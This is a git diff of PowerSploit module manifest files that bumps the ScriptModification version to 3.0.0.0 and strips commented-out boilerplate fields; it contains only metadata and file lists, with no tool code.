'PowerView.ps1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1', 'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'README.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1 index d326c12..923c874 100644 --- a/ScriptModification/ScriptModification.psd1 +++ b/ScriptModification/ScriptModification.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'ScriptModification.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' @@ -12,9 +12,6 @@ GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -24,65 +21,11 @@ Description = 'PowerSploit Script Preparation/Modification Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}) - # List of all files packaged with this module FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } -- cgit v1.2.3